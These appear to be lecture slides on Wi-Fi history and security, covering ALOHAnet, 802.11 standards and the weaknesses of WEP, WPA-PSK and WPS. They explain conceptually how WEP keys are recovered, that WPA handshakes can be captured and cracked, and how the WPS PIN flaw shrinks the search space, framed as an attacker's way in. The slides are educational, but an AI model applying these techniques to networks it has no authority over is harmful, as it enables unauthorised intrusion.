802.11 wireless, wep, wpa lecture
DESCRIPTION
Wi-Fi presentation for 2014-03-31TRANSCRIPT
802.11
Wireless, WEP and WPA
History
ALOHAnet - Hawaii
https://www.lib.utexas.edu/maps/us_2001/hawaii_ref_2001.jpg
ALOHAnet
June 1971
Version 1
Pure ALOHA
data.send
if network.collision {
do wait(time=random)
data.send
}
Pure ALOHA
http://upload.wikimedia.org/wikipedia/commons/thumb/3/35/Pure_ALOHA1.svg/800px-Pure_ALOHA1.svg.png
Slotted ALOHA
Only 18.4% of transmission time used for
successful frame transmissions
Version 2
Slotted ALOHA
Used discreet time slots
Station can only send at the beginning of a
time slot
All collisions at the beginning of a frame
Slotted ALOHA
http://upload.wikimedia.org/wikipedia/commons/thumb/7/7a/Slotted_ALOHA.svg/800px-Slotted_ALOHA.svg.png
Slotted ALOHA
Low-data-rate tactical satellite comms by
military
Subscriber based satellite comms networks
Mobile telephony call setup
Set top box comms
RFID
36.8% of transmission time used for
successful frame transmissions
Wireless
Range Max. Speed Frequency Year of release
Legacy 100m 2MB/s 2.4GHz 1997
802.11a 120m 54MB/s 5GHz 1999
802.11b 140m 11MB/s 2.4GHz 1999
802.11g 140m 54MB/s 2.4GHz 2003
802.11n 250m 150MB/s(per stream)
2.4GHz+5GHz 2009
802.11ac 866.7MB/s 5GHz 2014
Channels
http://en.wikipedia.org/wiki/File:2.4_GHz_Wi-Fi_channels_(802.11b,g_WLAN).svg
1-11 – Anywhere
12&13 – Anywhere except USA
14 – Japan only
WEP
Only used for legacy anymore
Neil still uses this at his home but shhhhh.
Very broken
WEP
How is a WEP connection made?
Probe request Client >>> AP
Probe response AP >>> Client
Authentication request Client >>> AP
Challenge AP >>> Client
Challenge Response Client >>> AP
Association request AP >>> Client
Association reponse Client >>> AP
How it works
24-bit IV (initialisation Vector)
Secret key (40Bit or 104Bit)
Result 64-Bit or 128-BitRC4 PRNG
Key StreamPlaintext Message
XOR’ed
CiphertextIV
Whys that broken?
• Only 16million possible IV’s
• On a 11MB/s link, with packets of 1500 bytes, can exhaust all possible IV’s in 5~ hours
• More collisions, easier for statistical attacks to calculate the original keystream
• Once you have keystream, you already have the IV, not hard to work out the secret key
WPA
• Replaced WEP
• Comes in 2 types, WPA and WPA2
• Each type has 2 flavours
– PSK (personal)
– Enterprise (802.1x + radius)
• WPA Had to use the same hardware as
WEP, only firmware updates allowed
• Used TKIP
WEP Vs. WPA
WEP WPA
Static session keys (always same key used for session start)
Dynamic session keys (different keys used for every session start)
WPA - PSK
Probe Request
Probe Response
Authentication Request
ANounce
Snounce + MIC
To Wireshark
CAPTURE FILE
The bigger picture
Pass phrase(8-63 chars)
Password Based Key Derivation Function (SSID)
Pre-shared Key (256-bit)
4-Way handshakeSnounceAnounceAP MAC
Client MAC
PTK (Pairwise transient key,
unique to session)
Pass phrase(8-63 chars)
Verify using MIC
Crackable?
Yes
BUT
Takes forever
Really need to be desperate
But there is one major flaw
WiFi Protected Setup
Security
Ease of UseFunctionality
WPS
• Simplifies WPA security for users
• Gives us a better in ;)
• Router breaks the key down into 2 sets of
4 numbers
• Tells client if a set it correct, even if the
other is wrong
• So, we have a lot fewer possibilities
Finally WPA-Enterprise